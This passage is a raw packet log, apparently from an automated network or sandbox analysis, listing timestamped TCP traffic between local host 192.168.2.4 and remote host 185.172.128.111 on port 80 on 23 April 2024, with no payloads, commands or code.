Apr 23, 2024 09:26:58.854485035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854506969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854512930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854542017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854547977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854577065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854583025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854612112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854617119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854648113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854660988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854681969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854691029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854717970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854722977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854753971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854758978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854789972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854793072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854825020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854832888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854860067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854863882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854896069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854902029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854932070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854933977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.854969025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.854974985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855005026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855010986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855040073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855045080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855074883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855077982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855113029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855118990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855148077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855155945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855192900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855195999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855232000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855247021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855267048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855273008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855303049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855307102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855339050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855346918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855374098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855384111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855410099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855421066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855444908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855456114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855480909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855492115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855515957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855525970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855551958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855561972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855588913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855597019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855623960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855639935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855659962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855667114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855695963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855701923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855731964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855739117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855768919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855778933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855806112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855812073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855840921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855849981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855876923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855886936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855912924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855921030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855948925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.855976105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.855983973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856019020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856023073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856054068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856060982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856089115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856091976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856132030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856139898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856178045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856193066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856213093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856235981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856247902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856273890 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856283903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856308937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856318951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856343985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856354952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856359959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856390953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856394053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856426954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856432915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856462002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856467009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856497049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856509924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856533051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856549025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856568098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856584072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856602907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856607914 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856638908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856673002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856679916 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856708050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856717110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856743097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856750965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856777906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856782913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856813908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856817961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856848001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856857061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856884956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856899023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856920958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856935024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856956959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856971979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.856992006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.856993914 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857027054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857036114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857062101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857070923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857099056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857104063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857136011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857141018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857173920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857182026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857208967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857227087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857244015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857261896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857279062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857290030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857314110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857321024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857348919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857357025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857384920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857389927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857419968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857429028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857455969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857460976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857491970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857501030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857528925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857539892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857563972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857574940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857599020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857618093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857635021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857650042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857669115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857691050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857705116 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857712984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857742071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.857745886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.857783079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.063606977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.063673973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.063710928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.063746929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.063783884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.063823938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.063843966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.063843966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.063843966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.063843966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.063843966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.063859940 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.063896894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.063934088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.063932896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.063934088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.063961983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.063971043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.063987017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064007044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064043045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064078093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064079046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064079046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064143896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064143896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064146996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064198017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064186096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064238071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064256907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064274073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064300060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064311028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064332008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064347029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064359903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064383030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064402103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064419031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064454079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064455032 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064474106 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064491987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064526081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064527035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064543962 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064563036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064589977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064599037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064630032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064635992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064649105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064675093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064708948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064728022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064728022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064743996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064762115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064780951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064806938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064816952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064846039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064852953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064867020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064888954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064912081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064924002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064949036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064960957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.064979076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.064996958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065021992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065032959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065052032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065068960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065088034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065104961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065138102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065140009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065160036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065179110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065191031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065216064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065237045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065253019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065273046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065289021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065309048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065325022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065356970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065360069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065382004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065396070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065423012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065433979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065448999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065469980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065499067 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065506935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065522909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065543890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065558910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065579891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065601110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065615892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065634012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065651894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065673113 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065686941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065718889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065723896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065737009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065761089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065787077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065797091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065818071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065834045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065861940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065870047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065881014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065905094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065928936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065939903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065959930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.065975904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.065994978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066010952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066035986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066047907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066071033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066082954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066088915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066121101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066138983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066155910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066176891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066193104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066212893 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066229105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066251040 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066265106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066286087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066299915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066325903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066335917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066369057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066371918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066386938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:59.066407919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:59.066432953 CEST	49730	80	192.168.2.4	185.172.128.111
